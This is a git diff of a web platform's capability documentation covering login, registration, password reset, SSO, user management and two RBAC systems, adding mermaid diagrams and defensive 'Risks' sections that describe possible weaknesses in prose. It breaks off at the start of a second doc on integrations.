+    Flags -.-> L
+    Flags -.-> SSO
+    Flags -.-> UM
+    style RC fill:#fef3c7
+    style AT fill:#dbeafe
+```
+
 ---
 
 ## Login / logout / token refresh
 
-- **Description:** Email+password login issuing a short-lived JWT access token (returned in the response body) and a long-lived refresh token set as an `httpOnly` cookie; refresh rotates the cookie and returns a new access token; logout revokes the refresh token and clears the cookie.
-- **Who uses it / value:** All end users (sign in); every downstream capability depends on a valid session. DevOps rely on it for access control.
-- **Acceptance criteria:**
-  - `POST /v2/auth/login {email,password}` → `200` with `{ user, tokens }` where `tokens` contains only `access` (refresh is **not** in the body); sets the `token` cookie (httpOnly; `Secure`+`SameSite=None` in prod, `Lax` in dev; `domain` only in prod). Invalid credentials → `401`. SSO-only account (no password) → `401` (the password-mismatch path; an SSO-only user has no password to match).
-  - `POST /v2/auth/refresh-tokens` with the cookie → `200` `{ access }` + rotated cookie. Missing/expired/revoked cookie → `401`.
-  - `POST /v2/auth/logout` with the cookie → `204`, refresh token document deleted, cookie cleared.
-  - 401s on `/auth/refresh-tokens`, `/auth/login`, `/auth/logout` are **not** retried (no refresh loop); other 401s trigger a single-flight refresh + queued-request replay, then `logOut()` on refresh failure.
-- **Quality control:** Sign in via UI → confirm `token` cookie present and `authStore.access` populated → reload keeps session; wrong password → error toast; let access token expire → silent refresh keeps session; logout → cookie gone, protected routes redirect to sign-in.
-- **Security:** Access token short-lived (`JWT_ACCESS_EXPIRATION_MINUTES`, 30 min prod / 30 days in dev), never persisted. Refresh token persisted server-side (`Token` collection, no TTL index), revoked on logout. `trust proxy` enabled. ⚠️ `authLimiter` is defined (`rateLimiter.js`) but **not applied to any route** — login endpoints are effectively unrate-limited (known gap).
-- **Data protection:** Passwords hashed (`bcrypt`) and marked `private` (never returned in user objects). Refresh cookie is `httpOnly` (no JS access); `Secure`/`SameSite=None`/`domain` apply only in production. Access tokens live only in memory (`authStore`), not persisted client-side.
+### Description
+
+Email+password login issuing a short-lived JWT access token (returned in the response body) and a long-lived refresh token set as an `httpOnly` cookie; refresh rotates the cookie and returns a new access token; logout revokes the refresh token and clears the cookie.
+
+### Who uses it / value
+
+All end users (sign in); every downstream capability depends on a valid session. DevOps rely on it for access control.
+
+### Acceptance criteria
+
+- `POST /v2/auth/login {email,password}` → `200` with `{ user, tokens }` where `tokens` contains only `access` (refresh is **not** in the body); sets the `token` cookie (httpOnly; `Secure`+`SameSite=None` in prod, `Lax` in dev; `domain` only in prod). Invalid credentials → `401`. SSO-only account (no password) → `401` (the password-mismatch path; an SSO-only user has no password to match).
+- `POST /v2/auth/refresh-tokens` with the cookie → `200` `{ access }` + rotated cookie. Missing/expired/revoked cookie → `401`.
+- `POST /v2/auth/logout` with the cookie → `204`, refresh token document deleted, cookie cleared.
+- 401s on `/auth/refresh-tokens`, `/auth/login`, `/auth/logout` are **not** retried (no refresh loop); other 401s trigger a single-flight refresh + queued-request replay, then `logOut()` on refresh failure.
+
+### Quality control
+
+Sign in via UI → confirm `token` cookie present and `authStore.access` populated → reload keeps session; wrong password → error toast; let access token expire → silent refresh keeps session; logout → cookie gone, protected routes redirect to sign-in.
+
+```mermaid
+sequenceDiagram
+    participant U as User/Browser
+    participant API as /v2/auth
+    participant DB as Token collection
+    U->>API: POST /login {email,password}
+    API->>API: bcrypt verify password
+    API->>DB: persist refresh token
+    API-->>U: 200 {user, tokens:{access}} + Set-Cookie token (httpOnly)
+    Note over U: access held in memory (authStore)
+    U->>API: POST /refresh-tokens (cookie)
+    API->>DB: verify + rotate refresh
+    API-->>U: 200 {access} + rotated Set-Cookie
+    U->>API: POST /logout (cookie)
+    API->>DB: delete refresh token doc
+    API-->>U: 204 + clear cookie
+```
+
+### Security
+
+Access token short-lived (`JWT_ACCESS_EXPIRATION_MINUTES`, 30 min prod / 30 days in dev), never persisted. Refresh token persisted server-side (`Token` collection, no TTL index), revoked on logout. `trust proxy` enabled. ⚠️ `authLimiter` is defined (`rateLimiter.js`) but **not applied to any route** — login endpoints are effectively unrate-limited (known gap).
+
+**Risks:**
+- **Credential brute-force / online guessing:** `authLimiter` is defined but not wired to any route, so `POST /v2/auth/login` can be hammered without throttling — weak passwords are exposed to online brute-force and credential-stuffing attacks.
+- **Refresh-token theft:** the long-lived refresh cookie is the equivalent of a long-lived session; an XSS-less cookie steal (e.g. via a compromised subdomain or log injection capturing the cookie) yields persistent account takeover, since the cookie is `httpOnly` but not bound to the access token or device.
+- **No expiry sweep:** the `Token` collection has no TTL index, so revoked/abandoned refresh tokens accumulate, and a stolen refresh token stays valid until explicit logout — extending the window of a token-theft attack.
+
+### Data protection
+
+Passwords hashed (`bcrypt`) and marked `private` (never returned in user objects). Refresh cookie is `httpOnly` (no JS access); `Secure`/`SameSite=None`/`domain` apply only in production. Access tokens live only in memory (`authStore`), not persisted client-side.
+
+**Risks:**
+- **Password exposure on transport:** in dev the cookie is `Lax`/non-`Secure`, so a refresh cookie captured on a non-HTTPS dev/demo network exposes a long-lived session.
+- **Access-token leak via memory dump:** access tokens live in JS memory; a compromised browser extension or tab crash dump can exfiltrate the short-lived access token — bounded by expiry but enough to act within 30 min in prod.
 
 ## Registration
 
-- **Description:** Self-service account creation that issues tokens and sets the refresh cookie.
-- **Who uses it / value:** New end users (sign up); admins benefit from reduced account-provisioning load.
-- **Acceptance criteria:**
-  - `POST /v2/auth/register` → `201` `{ user, tokens }` (refresh in cookie only) when `SELF_REGISTRATION` is enabled.
-  - When `SELF_REGISTRATION` is disabled → `403`. Duplicate email → `400` (`email already taken`).
-  - A welcome email is sent (non-blocking — failure doesn't fail registration).
-- **Quality control:** With `SELF_REGISTRATION=true` register a new email → `201` + session cookie; with it `false` → `403`; reuse an existing email → `400`.
-- **Security:** Gated by the `SELF_REGISTRATION` site auth flag; no admin needed. Email uniqueness enforced.
-- **Data protection:** Stores `email` (unique, lowercased), hashed `password`, `email_verified=false`. Email masked in public list responses.
+### Description
+
+Self-service account creation that issues tokens and sets the refresh cookie.
+
+### Who uses it / value
+
+New end users (sign up); admins benefit from reduced account-provisioning load.
+
+### Acceptance criteria
+
+- `POST /v2/auth/register` → `201` `{ user, tokens }` (refresh in cookie only) when `SELF_REGISTRATION` is enabled.
+- When `SELF_REGISTRATION` is disabled → `403`. Duplicate email → `400` (`email already taken`).
+- A welcome email is sent (non-blocking — failure doesn't fail registration).
+
+### Quality control
+
+With `SELF_REGISTRATION=true` register a new email → `201` + session cookie; with it `false` → `403`; reuse an existing email → `400`.
+
+```mermaid
+flowchart TD
+    U([Visitor]) -->|"POST /v2/auth/register"| G{SELF_REGISTRATION?}
+    G -->|false| N1["403"]
+    G -->|true| D{email unique?}
+    D -->|no| N2["400 email already taken"]
+    D -->|yes| C["create user · hash password · issue tokens"]
+    C --> EM["welcome email (non-blocking)"]
+    C --> O["201 {user,tokens} + cookie"]
+```
+
+### Security
+
+Gated by the `SELF_REGISTRATION` site auth flag; no admin needed. Email uniqueness enforced.
+
+**Risks:**
+- **Account-spam / namespace squatting:** with `SELF_REGISTRATION` enabled and no rate limit (the `authLimiter` gap), an attacker can bulk-create accounts to squat names/emails or enumerate which addresses are already registered via the `400` duplicate signal.
+- **Welcome-email enumeration / abuse:** the welcome email is sent on every successful registration; a script can weaponize registration to spam arbitrary addresses from the platform's mail reputation.
+
+### Data protection
+
+Stores `email` (unique, lowercased), hashed `password`, `email_verified=false`. Email masked in public list responses.
+
+**Risks:**
+- **Email enumeration via duplicate signal:** the `400 email already taken` response lets an attacker probe which addresses are registered, enabling account-enumeration and targeted phishing.
+- **Unverified-identity persistence:** accounts are created with `email_verified=false` and no proof of email ownership at creation time, so an attacker can register using someone else's email and impersonate them until verification is enforced.
 
 ## Password reset & email verification
 
-- **Description:** Code-based password reset (primary): a 6-digit code is emailed, valid 60 minutes, verified with `{email, code, password}`. Legacy token-based reset (`?token`) retained. Email verification issues a verify token.
-- **Who uses it / value:** End users who lost a password or need to verify email; admins (fewer password reset requests).
-- **Acceptance criteria:**
-  - `POST /v2/auth/forgot-password {email}` → `200 { message }` (always, to avoid user enumeration) and emails a 6-digit code (60 min). Reset events are logged.
-  - `POST /v2/auth/reset-password` with `{email, code, password}` (primary) → `204`; or `?token` + `{password}` (legacy) → `204`. Missing both → `400`. Wrong/expired code → `400`.
-  - `POST /v2/auth/send-verification-email` (auth) → `204` and emails a verify token; `POST /v2/auth/verify-email?token=…` → `204`, sets `email_verified=true`.
-  - Password changes require the `PASSWORD_MANAGEMENT` flag.
-- **Quality control:** Trigger forgot-password → receive code → reset → log in with new password; try an expired/wrong code → `400`; verify-email → `email_verified` flips true.
-- **Security:** Reset codes persisted in `Token` (`type=RESET_PASSWORD`); existing reset tokens for the user are deleted on each `forgot-password` (single-use). Password change gated by `PASSWORD_MANAGEMENT`. Forgot-password logs the event (to the log service).
-- **Data protection:** Codes/tokens are one-time, short-lived, and deleted on use. Passwords hashed; never logged. Email is the recovery handle.
+### Description
+
+Code-based password reset (primary): a 6-digit code is emailed, valid 60 minutes, verified with `{email, code, password}`. Legacy token-based reset (`?token`) retained. Email verification issues a verify token.
+
+### Who uses it / value
+
+End users who lost a password or need to verify email; admins (fewer password reset requests).
+
+### Acceptance criteria
+
+- `POST /v2/auth/forgot-password {email}` → `200 { message }` (always, to avoid user enumeration) and emails a 6-digit code (60 min). Reset events are logged.
+- `POST /v2/auth/reset-password` with `{email, code, password}` (primary) → `204`; or `?token` + `{password}` (legacy) → `204`. Missing both → `400`. Wrong/expired code → `400`.
+- `POST /v2/auth/send-verification-email` (auth) → `204` and emails a verify token; `POST /v2/auth/verify-email?token=…` → `204`, sets `email_verified=true`.
+- Password changes require the `PASSWORD_MANAGEMENT` flag.
+
+### Quality control
+
+Trigger forgot-password → receive code → reset → log in with new password; try an expired/wrong code → `400`; verify-email → `email_verified` flips true.
+
+```mermaid
+sequenceDiagram
+    participant U as User
+    participant API as /v2/auth
+    participant DB as Token (RESET_PASSWORD)
+    participant M as Mail
+    U->>API: POST /forgot-password {email}
+    API->>DB: delete existing reset tokens for user
+    API->>DB: create 6-digit code (60min)
+    API->>M: send code
+    API-->>U: 200 {message} (always)
+    U->>API: POST /reset-password {email,code,password}
+    API->>DB: verify code (single-use)
+    API->>API: hash new password
+    API->>DB: delete code
+    API-->>U: 204
+```
+
+### Security
+
+Reset codes persisted in `Token` (`type=RESET_PASSWORD`); existing reset tokens for the user are deleted on each `forgot-password` (single-use). Password change gated by `PASSWORD_MANAGEMENT`. Forgot-password logs the event (to the log service).
+
+**Risks:**
+- **6-digit code brute-force:** the primary reset is a 6-digit code with no documented rate limit on `POST /v2/auth/reset-password`; an attacker holding an email can attempt codes until success within the 60-minute window (only ~1M space, and the always-`200` forgot-password response prevents enumeration but not guessing).
+- **Account takeover via legacy token path:** the `?token` legacy reset path is retained; if those tokens are predictable, long-lived, or not single-use, an attacker can forge or reuse them to reset passwords without controlling the email.
+- **Audit gap on reset:** reset events are logged but only `forgot-password` is noted as logged — a successful `reset-password` from a stolen code leaves a thin trail, complicating takeover forensics.
+
+### Data protection
+
+Codes/tokens are one-time, short-lived, and deleted on use. Passwords hashed; never logged. Email is the recovery handle.
+
+**Risks:**
+- **Recovery-handle hijack:** email is the sole recovery handle; anyone controlling the mailbox receives the 6-digit code and can take over the account, regardless of password strength.
+- **Code-in-log exposure:** if the mailed 6-digit code or legacy token is captured by mailbox middleware or logged by an upstream mail relay, the one-time secret leaks before use.
 
 ## SSO (OIDC ID-token + GitHub OAuth)
 
-- **Description:** Single sign-on via configurable providers in `SSO_PROVIDERS`. Microsoft-style providers use an OIDC ID-token flow (`parseIdToken`); GitHub uses a full OAuth code-exchange. Auto-registers on first login when `SSO_AUTO_REGISTRATION` is enabled. A legacy GitHub callback links an existing account.
-- **Who uses it / value:** End users (passwordless login); enterprises (SSO integration); DevOps/integrators (configure providers).
-- **Acceptance criteria:**
-  - `POST /v2/auth/sso {providerId, idToken}` → validates the provider is enabled, decodes the ID token, creates/updates the user, issues tokens + cookie → `200 { user, tokens }`. Disabled/invalid provider → `400`.
-  - `GET /v2/auth/github-sso/start` → redirects to GitHub; `GET /v2/auth/github-sso/callback` → exchanges code, fetches profile/emails, logs in.
-  - First SSO login creates an account only if `SSO_AUTO_REGISTRATION` is true; otherwise a matching existing account is required.
-  - `GET /v2/auth/github/callback` (legacy) → exchanges code and emits the token over the user's socket for account linking.
-- **Quality control:** Configure a provider in Admin → Site Config → SSO; sign in via the provider button → account created/linked and session established; disable the provider → button hidden / `400`.
-- **Security:** Provider `clientSecret`s are **encrypted at rest** (`utils/encryption.js`), decrypted only for admin display. `callMsGraph` is deprecated (ID-token flow uses only OpenID scopes). Auto-registration gated by `SSO_AUTO_REGISTRATION`.
-- **Data protection:** SSO provider secrets never exposed to non-admins (public list returns only enabled providers without secrets). SSO-linked users store `provider`/`provider_user_id`/`provider_data`; password optional for SSO accounts.
+### Description
+
+Single sign-on via configurable providers in `SSO_PROVIDERS`. Microsoft-style providers use an OIDC ID-token flow (`parseIdToken`); GitHub uses a full OAuth code-exchange. Auto-registers on first login when `SSO_AUTO_REGISTRATION` is enabled. A legacy GitHub callback links an existing account.
+
+### Who uses it / value
+
+End users (passwordless login); enterprises (SSO integration); DevOps/integrators (configure providers).
+
+### Acceptance criteria
+
+- `POST /v2/auth/sso {providerId, idToken}` → validates the provider is enabled, decodes the ID token, creates/updates the user, issues tokens + cookie → `200 { user, tokens }`. Disabled/invalid provider → `400`.
+- `GET /v2/auth/github-sso/start` → redirects to GitHub; `GET /v2/auth/github-sso/callback` → exchanges code, fetches profile/emails, logs in.
+- First SSO login creates an account only if `SSO_AUTO_REGISTRATION` is true; otherwise a matching existing account is required.
+- `GET /v2/auth/github/callback` (legacy) → exchanges code and emits the token over the user's socket for account linking.
+
+### Quality control
+
+Configure a provider in Admin → Site Config → SSO; sign in via the provider button → account created/linked and session established; disable the provider → button hidden / `400`.
+
+```mermaid
+sequenceDiagram
+    participant U as User
+    participant API as /v2/auth
+    participant P as SSO Provider
+    U->>API: POST /sso {providerId, idToken}
+    API->>API: validate provider enabled
+    API->>API: parseIdToken (OIDC) / verify
+    alt SSO_AUTO_REGISTRATION
+        API->>API: create or update user
+    else matching account required
+        API->>API: lookup existing user
+    end
+    API-->>U: 200 {user,tokens} + cookie
+    Note over U,API: GitHub full OAuth: start → callback → code exchange
+    U->>API: GET /github-sso/start
+    API-->>P: redirect to GitHub
+    U->>API: GET /github-sso/callback?code=
+    API->>P: exchange code → profile/emails
+    API-->>U: session
+```
+
+### Security
+
+Provider `clientSecret`s are **encrypted at rest** (`utils/encryption.js`), decrypted only for admin display. `callMsGraph` is deprecated (ID-token flow uses only OpenID scopes). Auto-registration gated by `SSO_AUTO_REGISTRATION`.
+
+**Risks:**
+- **ID-token replay / acceptance of forged tokens:** `POST /v2/auth/sso` trusts a client-supplied `idToken`; if the provider's signature/issuer/audience is not strictly validated (or a stolen ID token is replayed within its lifetime), an attacker can impersonate any user by submitting a captured or crafted token.
+- **Auto-registration identity squatting:** with `SSO_AUTO_REGISTRATION=true`, an attacker controlling a provider tenant or a permissive email claim can mint accounts matching arbitrary emails, then later collide with a real user's email when that user first signs in.
+- **Supply-chain / misconfigured provider:** a malicious or misconfigured provider in `SSO_PROVIDERS` (over-broad scopes, leaked `clientSecret` despite encryption-at-rest) becomes a silent backdoor to account creation and login.
+
+### Data protection
+
+SSO provider secrets never exposed to non-admins (public list returns only enabled providers without secrets). SSO-linked users store `provider`/`provider_user_id`/`provider_data`; password optional for SSO accounts.
+
+**Risks:**
+- **Provider-data persistence:** `provider_data` (profile/emails from the IdP) is stored indefinitely; if the provider later revokes or changes the user's identity, stale `provider_user_id` bindings keep pointing at the local account, enabling identity confusion or takeovers after an email change at the IdP.
+- **Secret-at-rest dependence:** encryption-at-rest protects `clientSecret`s only as long as the encryption key is separate from the database; a key leak makes all provider secrets decryptable at once.
 
 ## User profile
 
-- **Description:** Self-service read/update of display name and avatar; change password (when `PASSWORD_MANAGEMENT` is enabled).
-- **Who uses it / value:** End users (manage their identity/avatar).
-- **Acceptance criteria:**
-  - `GET /v2/users/self` (auth) → `200` current user. `PATCH /v2/users/self` → `200` updated user (name/avatar; password only when `PASSWORD_MANAGEMENT=true`).
-- **Quality control:** Open `/profile` → edit name → save → name updates across the UI; change password → log in with new password.
-- **Security:** Auth required; self only (no cross-user self-edit).
-- **Data protection:** Avatar stored as a file path; password hashed and `private` (never returned).
+### Description
+
+Self-service read/update of display name and avatar; change password (when `PASSWORD_MANAGEMENT` is enabled).
+
+### Who uses it / value
+
+End users (manage their identity/avatar).
+
+### Acceptance criteria
+
+- `GET /v2/users/self` (auth) → `200` current user. `PATCH /v2/users/self` → `200` updated user (name/avatar; password only when `PASSWORD_MANAGEMENT=true`).
+
+### Quality control
+
+Open `/profile` → edit name → save → name updates across the UI; change password → log in with new password.
+
+```mermaid
+sequenceDiagram
+    participant U as User
+    participant API as /v2/users/self
+    U->>API: GET (auth)
+    API-->>U: 200 current user
+    U->>API: PATCH {name, avatar, password?}
+    alt password present
+        API->>API: require PASSWORD_MANAGEMENT
+    end
+    API-->>U: 200 updated user
+```
+
+### Security
+
+Auth required; self only (no cross-user self-edit).
+
+**Risks:**
+- **Password-change bypass:** if the `PASSWORD_MANAGEMENT` gate is checked client-side only, a direct `PATCH /v2/users/self` with a `password` field could change a password without the flag, defeating the policy.
+- **Self-edit of identifier:** if validation is loose, a user could change their `email` or other identifying field via `PATCH /v2/users/self` to collide with another account, enabling impersonation.
+
+### Data protection
+
+Avatar stored as a file path; password hashed and `private` (never returned).
+
+**Risks:**
+- **Avatar path injection:** storing an avatar as a file path (rather than an opaque asset id) opens the door to path traversal or SSRF if the path is rendered/loaded without normalization.
+- **Password-in-history loss:** changing a password has no documented "current password" requirement, so a hijacked session can rotate the password and lock the legitimate user out irreversibly.
 
 ## User management (admin)
 
-- **Description:** Admin CRUD over users; public listing gated by `PUBLIC_VIEWING`; emails masked in responses.
-- **Who uses it / value:** Admins (provision/manage users); end users (discoverable profiles when `PUBLIC_VIEWING`).
-- **Acceptance criteria:**
-  - `GET /v2/users` (optional auth via `PUBLIC_VIEWING`) → `200` paginated list (emails masked). `POST /v2/users` → `201` (admin). `GET /v2/users/:userId` (optional auth via `PUBLIC_VIEWING`) → `200`; `PATCH/DELETE /v2/users/:userId` (admin) → `200`/`204`.
-  - Non-admin write → `403`. `includeFullDetails` query requires admin.
-- **Quality control:** As admin, create/list/update/delete a user → works; as non-admin, writes → `403`; with `PUBLIC_VIEWING=false` and signed-out, list → `401`.
-- **Security:** Writes require `MANAGE_USERS`. Read of `includeFullDetails` admin-gated.
-- **Data protection:** Email masking in list responses; `password` field `private`; `includeFullDetails` admin-only.
+### Description
+
+Admin CRUD over users; public listing gated by `PUBLIC_VIEWING`; emails masked in responses.
+
+### Who uses it / value
+
+Admins (provision/manage users); end users (discoverable profiles when `PUBLIC_VIEWING`).
+
+### Acceptance criteria
+
+- `GET /v2/users` (optional auth via `PUBLIC_VIEWING`) → `200` paginated list (emails masked). `POST /v2/users` → `201` (admin). `GET /v2/users/:userId` (optional auth via `PUBLIC_VIEWING`) → `200`; `PATCH/DELETE /v2/users/:userId` (admin) → `200`/`204`.
+- Non-admin write → `403`. `includeFullDetails` query requires admin.
+
+### Quality control
+
+As admin, create/list/update/delete a user → works; as non-admin, writes → `403`; with `PUBLIC_VIEWING=false` and signed-out, list → `401`.
+
+```mermaid
+flowchart LR
+    A([Admin]) -->|POST/GET/PATCH/DELETE| U["/v2/users[/:id]"]
+    G{PUBLIC_VIEWING?} -->|true + anon| L["200 masked list"]
+    G -->|false + anon| N1["401"]
+    G -->|authed| L
+    U -->|non-admin write| N2["403"]
+    U -->|includeFullDetails| AD["admin-only"]
+```
+
+### Security
+
+Writes require `MANAGE_USERS`. Read of `includeFullDetails` admin-gated.
+
+**Risks:**
+- **Privilege escalation via user edit:** a missing or weak `MANAGE_USERS` check on `PATCH /v2/users/:userId` could let an attacker elevate a victim to admin (or elevate their own account), granting platform-wide control.
+- **Unmasked-email enumeration:** if email masking is applied at the response layer but `includeFullDetails` (admin-only) is not enforced server-side, a non-admin could recover full emails of every user.
+- **Irreversible user delete:** `DELETE /v2/users/:userId` is a hard operation; a compromised or rogue admin permanently destroys a user record and its audit trail with no soft-delete recovery.
+
+### Data protection
+
+Email masking in list responses; `password` field `private`; `includeFullDetails` admin-only.
+
+**Risks:**
+- **PII leakage via masked-but-recoverable emails:** masked emails still leak structure (domain, length, prefix length); combined with the public list when `PUBLIC_VIEWING=true`, this enables user-enumeration and targeted phishing.
+- **Hard-delete audit gap:** deleting a user removes the identity anchored to all their prior actions, breaking attribution of historical activity and leaving an audit gap.
 
 ## RBAC v1 (primary)
 
-- **Description:** Resource-scoped roles granting permissions bound to a `ref` (model/asset id or `*`); owners bypass checks. Used by `checkPermission` middleware and `usePermissionHook`.
-- **Who uses it / value:** Model/asset owners (grant access); admins (assign global roles); end users (only see what they're permitted).
-- **Acceptance criteria:**
-  - `GET /v2/permissions/self` (auth) → own roles. `GET /v2/permissions` → all permissions. `GET /v2/permissions/has-permission?permissions=readModel,writeModel:modelId` → `boolean[]` in order (defaults denied).
-  - `POST /v2/permissions {user,role,ref}` (admin) → `201` assigns role. `DELETE /v2/permissions?user=&role=` (admin) → `204` removes.
-  - `GET /v2/permissions/users-by-roles` (admin) → users grouped by role (no `role` filter).
-  - Owner of a resource bypasses the permission check for that resource.
-- **Quality control:** Assign a user `writeModel:<modelId>` → they can edit that model; remove it → edits `403`; `has-permission` with a missing/unknown permission → `false`.
-- **Security:** Assign/remove require `MANAGE_USERS`; `has-permission` requires auth. Owners bypass — ensure ownership transfers are intentional.
-- **Data protection:** UserRole records bind `(user, role, ref)` (unique); no secrets stored.
+### Description
+
+Resource-scoped roles granting permissions bound to a `ref` (model/asset id or `*`); owners bypass checks. Used by `checkPermission` middleware and `usePermissionHook`.
+
+### Who uses it / value
+
+Model/asset owners (grant access); admins (assign global roles); end users (only see what they're permitted).
+
+### Acceptance criteria
+
+- `GET /v2/permissions/self` (auth) → own roles. `GET /v2/permissions` → all permissions. `GET /v2/permissions/has-permission?permissions=readModel,writeModel:modelId` → `boolean[]` in order (defaults denied).
+- `POST /v2/permissions {user,role,ref}` (admin) → `201` assigns role. `DELETE /v2/permissions?user=&role=` (admin) → `204` removes.
+- `GET /v2/permissions/users-by-roles` (admin) → users grouped by role (no `role` filter).
+- Owner of a resource bypasses the permission check for that resource.
+
+### Quality control
+
+Assign a user `writeModel:<modelId>` → they can edit that model; remove it → edits `403`; `has-permission` with a missing/unknown permission → `false`.
+
+```mermaid
+sequenceDiagram
+    participant C as Caller
+    participant M as checkPermission middleware
+    participant DB as UserRole (user,role,ref)
+    C->>M: request on resource ref
+    M->>M: is caller owner of ref?
+    alt owner
+        M-->>C: allow (bypass)
+    else not owner
+        M->>DB: query (user, role, ref)
+        alt has binding
+            M-->>C: allow
+        else no binding
+            M-->>C: 403
+        end
+    end
+```
+
+### Security
+
+Assign/remove require `MANAGE_USERS`; `has-permission` requires auth. Owners bypass — ensure ownership transfers are intentional.
+
+**Risks:**
+- **Privilege escalation via grant:** a missing `MANAGE_USERS` check on `POST /v2/permissions` lets any authenticated user grant themselves or others arbitrary roles (e.g. `writeModel:*`), escalating to global write access.
+- **Owner-bypass abuse:** ownership bypass means whoever owns a `ref` gains full rights to it; an unintended ownership transfer (or a model created with a hijacked `created_by`) silently grants full control to the wrong party.
+- **Wildcard ref explosion:** `ref=*` grants apply globally; an over-broad `*` grant is a one-shot privilege escalation that no per-resource check can ever deny.
+
+### Data protection
+
+UserRole records bind `(user, role, ref)` (unique); no secrets stored.
+
+**Risks:**
+- **Relationship/capability leak:** `GET /v2/permissions` and `users-by-roles` expose who can do what on which resource — a capability map an attacker can use to target high-privilege users or sensitive `ref`s.
+- **Persistence of mis-grants:** without an audit trail of permission changes, a mis-granted role persists silently until someone notices and manually revokes it.
 
 ## Casbin RBAC v2 (partial)
 
-- **Description:** Second-generation authorization using Casbin + mongoose adapter with `owner/writer/reader` grouping policies and `enforce(sub, act, obj)` via the internal authorize endpoint.
-- **Who uses it / value:** Integrators building programmatic auth checks; future migration target.
-- **Acceptance criteria:**
-  - `POST /v2/auth/authorize` (internal; no auth barrier on the route) → `200 { message: 'Authorized' }` on success, `403` on denial.
-  - `hasPermissionV2` / `assignRoleToUserV2` available in `permission.service`.
-- **Quality control:** Call `/authorize` with a permitted subject/action/object → `true`; with a denied one → `false`.
-- **Security:** Auth required; policy assignment is admin. **Partial** — v1 remains the primary path for most resource checks.
-- **Data protection:** Casbin policies stored via mongoose adapter; no secrets.
+### Description
+
+Second-generation authorization using Casbin + mongoose adapter with `owner/writer/reader` grouping policies and `enforce(sub, act, obj)` via the internal authorize endpoint.
+
+### Who uses it / value
+
+Integrators building programmatic auth checks; future migration target.
+
+### Acceptance criteria
+
+- `POST /v2/auth/authorize` (internal; no auth barrier on the route) → `200 { message: 'Authorized' }` on success, `403` on denial.
+- `hasPermissionV2` / `assignRoleToUserV2` available in `permission.service`.
+
+### Quality control
+
+Call `/authorize` with a permitted subject/action/object → `true`; with a denied one → `false`.
+
+```mermaid
+flowchart TD
+    C([Caller]) -->|"POST /v2/auth/authorize {sub,act,obj}"| A["enforce(sub,act,obj)"]
+    A --> P[("Casbin policies (mongoose adapter)")]
+    P -->|owner/writer/reader groups| R{allowed?}
+    R -->|yes| OK["200 Authorized"]
+    R -->|no| N1["403"]
+```
+
+### Security
+
+Auth required; policy assignment is admin. **Partial** — v1 remains the primary path for most resource checks.
+
+**Risks:**
+- **Unauthenticated authorize endpoint:** `POST /v2/auth/authorize` has no auth barrier on the route, so an internal caller that reaches it can probe authorization decisions for arbitrary `(sub, act, obj)` — an oracle to enumerate who can do what.
+- **Dual-RBAC drift:** v1 and v2 coexist; a resource check routed through v1 may diverge from v2's policy, leaving gaps where one says allow and the other deny — easy to mis-configure during partial migration.
+- **Policy-tamper via admin grant:** `assignRoleToUserV2` is admin-controlled; a compromised admin can rewrite Casbin policies to grant themselves `owner` on every object.
+
+### Data protection
+
+Casbin policies stored via mongoose adapter; no secrets.
+
+**Risks:**
+- **Policy-set exposure:** the policy store encodes the full capability graph; a read of the mongoose-backed policies (via a backup leak or admin API) reveals the entire authorization model.
+- **Silent policy drift:** partial adoption means v2 policies may be stale or inconsistent with v1, so a "denied" decision can flip to "allowed" (or vice versa) on a policy reload with no audit signal.
 
 ## Manage Users & Manage Features (admin)
 
-- **Description:** Admin UIs to manage users (`/admin/manage-users`) and feature/role assignments (`/manage-features`).
-- **Who uses it / value:** Admins (provision users, grant capabilities).
-- **Acceptance criteria:**
-  - `/admin/manage-users`: paginated list with search, create user, per-user role/permission actions.
-  - `/manage-features`: feature categories sidebar (permission roles) + add/remove users per feature.
-  - Non-admin → `403`.
-- **Quality control:** As admin, create a user and grant a feature role → the user gains that capability; revoke → loses it; as non-admin, page → `403`/hidden.
-- **Security:** Both require `MANAGE_USERS`.
-- **Data protection:** Operates on user/role records; no secrets surfaced beyond what user management already exposes.
+### Description
+
+Admin UIs to manage users (`/admin/manage-users`) and feature/role assignments (`/manage-features`).
+
+### Who uses it / value
+
+Admins (provision users, grant capabilities).
+
+### Acceptance criteria
+
+- `/admin/manage-users`: paginated list with search, create user, per-user role/permission actions.
+- `/manage-features`: feature categories sidebar (permission roles) + add/remove users per feature.
+- Non-admin → `403`.
+
+### Quality control
+
+As admin, create a user and grant a feature role → the user gains that capability; revoke → loses it; as non-admin, page → `403`/hidden.
+
+```mermaid
+flowchart TD
+    A([Admin]) --> MU["/admin/manage-users"]
+    A --> MF["/manage-features"]
+    MU -->|create/search/per-user roles| U[("users collection")]
+    MF -->|add/remove user per feature| UR[("UserRole bindings")]
+    NA([Non-admin]) -->|access| N1["403 / hidden"]
+```
+
+### Security
+
+Both require `MANAGE_USERS`.
+
+**Risks:**
+- **Bulk privilege grant:** the manage-features UI grants feature roles to users in bulk; a compromised admin can sweep-grant admin-tier capabilities across many accounts in one action.
+- **UI-bypass via direct API:** if the page-level `MANAGE_USERS` guard is enforced in the UI but the underlying `/v2/users` and `/v2/permissions` endpoints are not independently re-checked, an admin UI bypass (or direct API call) could perform the same grants.
+- **Feature-role naming confusion:** feature categories map to permission roles; a mislabeled category can trick an admin into granting a more powerful role than the label suggests.
+
+### Data protection
+
+Operates on user/role records; no secrets surfaced beyond what user management already exposes.
+
+**Risks:**
+- **Mass PII access:** manage-users surfaces a searchable, paginated list of all users with editable PII — a single compromised admin session exposes and can mutate the entire user directory.
+- **Grant-trail gap:** feature-role grants made through the UI may not be audited beyond the underlying permission endpoint, so bulk grants can leave a thin forensic trail.

--- a/docs/capabilities/integrations-platform.md
+++ b/docs/capabilities/integrations-platform.md
@@ -1,160 +1,678 @@
 # Cluster: Integrations & Platform
 
-External integrations, search/content, and platform/system capabilities.
+External integrations (GenAI, GitHub, email, Web Studio), search/content, and platform/system capabilities (health, upload, audit, static serving, security middleware, realtime, log/cache).
+
+```mermaid
+flowchart TD
+    subgraph External integrations
+        GA["GenAI service proxy<br/>(/v2/genai/* → GENAI_URL)"]
+        SDV["SDV ProtoPilot<br/>(GENAI_SDV_APP_ENDPOINT · GENAI_MARKETPLACE_URL)"]
+        GH["GitHub OAuth + SSO<br/>(/v2/auth/github*)"]
+        EM["Email service<br/>(Resend / SMTP)"]
+        WS["Web Studio widget"]
+        GA -.->|powers| SDV
+    end
+    subgraph Content & collaboration
+        SE["Search<br/>(/v2/search*)"]
+        DI["Discussions"]
+        FB["Feedback service"]
+    end
+    subgraph Platform
+        HC["Health check<br/>(/v2/health)"]
+        FU["File upload<br/>(/v2/file/upload/store-be)"]
